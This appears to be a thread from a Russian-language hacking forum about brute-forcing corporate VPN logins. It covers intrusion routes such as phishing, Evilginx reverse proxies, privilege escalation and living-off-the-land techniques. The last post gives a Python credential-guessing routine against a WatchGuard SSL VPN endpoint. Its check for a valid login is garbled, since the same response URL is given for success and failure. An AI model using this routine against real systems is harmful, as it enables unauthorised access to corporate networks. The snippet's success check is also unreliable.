• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Брут корп впнов. Обсуждение. Вопросы.

Отслеживать
BLUA сказал(а):
Прощё проеверить на реальных таргетах, к которым есть доступ.
Вот ещё виртуалку поднимать...
Ну это лишь вопрос шума при (неудачной) проверке...
 
lisa99 сказал(а):
а почему?

  • стали ответственнее админы?
  • требования корпоративных стандартов на пароли? (инструкции человеку)
  • автопроверка сложности скриптами? (рэндомизация, блокировка простого - софт?)
  • ИИ перепроверяет настройки политик безопасности, настройки EDR, etc?

или всё вкупе?
ну в серьёзных конторах:
1. Извне ничего не видно как правило, заход для "одминства" через джампсервер (не одноимённое ПО, а сама методика) и главное другую непубличную сеть. Как вариант VPN конторский с физическими токенами с кодами у сотрудников, прям девайсы размером с мини-калькулятор и они код кажут.
2. К паролю добавили 2-й фактор как правило где только можно, причём реальный второй фактор (Okta, например) а не ввод 2FA кода в фому следом который легко перехватывается реверс прокси типа Evilginx.

Через что обычно ломают так это через фишинг необученых сотрудников, или WEB'ку кривую плюс потом privesc (и то и другое если повезёт разумеется), или также через бестолковых но при этом трастовых поставщиков ещё модно стало (см. новый OWASP Top 10 от 2025 его наконец-то родили они к концу года).
Также модным стал LOTL (Living Off The Land) когда стандартными тулзами не вызывающими подозрений закреп осуществляется, но это уже не Initial Access, а стадия Evasion скорее.
 
Snow сказал(а):
я там анонсировал статью про брут. Получилось уже больше 20 страниц. Сегодня выложить постараюсь.
Посмотреть вложение 111338
статья готова, начинаю заливать. для самых нетерпеливых приложу пдфку, ну не умею я ваши маркдауны готовить. LaTex forever
 
Snow сказал(а):
статья готова, начинаю заливать. для самых нетерпеливых приложу пдфку, ну не умею я ваши маркдауны готовить. LaTex forever

⏰
Tick Tack, Tic Tack...
 
xss_user сказал(а):
⏰
Tick Tack, Tic Tack...
пдфка почти 5 мб, во вложение не хочет крепиться
куда лучше залить?
 
Snow сказал(а):
пдфка почти 5 мб, во вложение не хочет крепиться
куда лучше залить?
можно временно сюда залить https:// wasabi. com/ вроде как месяц триала дают
 
Snow сказал(а):
куда лучше залить?
как насчёт дамаги которая либа (ещё и форум появился там) ? тут почему-то прячут на неё ссылки. туда можно заливать по идее, я туда PDF книги заливаю обычно.
 

Вложения

  • brt_art.pdf
    960 КБ · Просмотры: 43
Последнее редактирование:

Watchguard SSL VPN​

URL для аутентификации - https://{target}/wgcgi.cgi
Payload:
Код: 
data = {'fw_username': login, 'fw_password': password, 'fw_domain': 'Firebox-DB', 'submit': 'Login', 'action': 'sslvpn_web_logon', 'fw_logon_type': 'logon', 'lang': 'en-US'}

Отправляем запрос:
Код: 
ses = requests.Session()
resp = ses.post(f'https://{target}/wgcgi.cgi', verify=False, data=data)
print(resp.url)

Проверка. Если валид, то в адресе будет :
Код: 
https://{target}/sslvpn_logon.shtml?errcode=501

Если не валид, то:
Код: 
https://{target}/sslvpn_logon.shtml?errcode=501
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх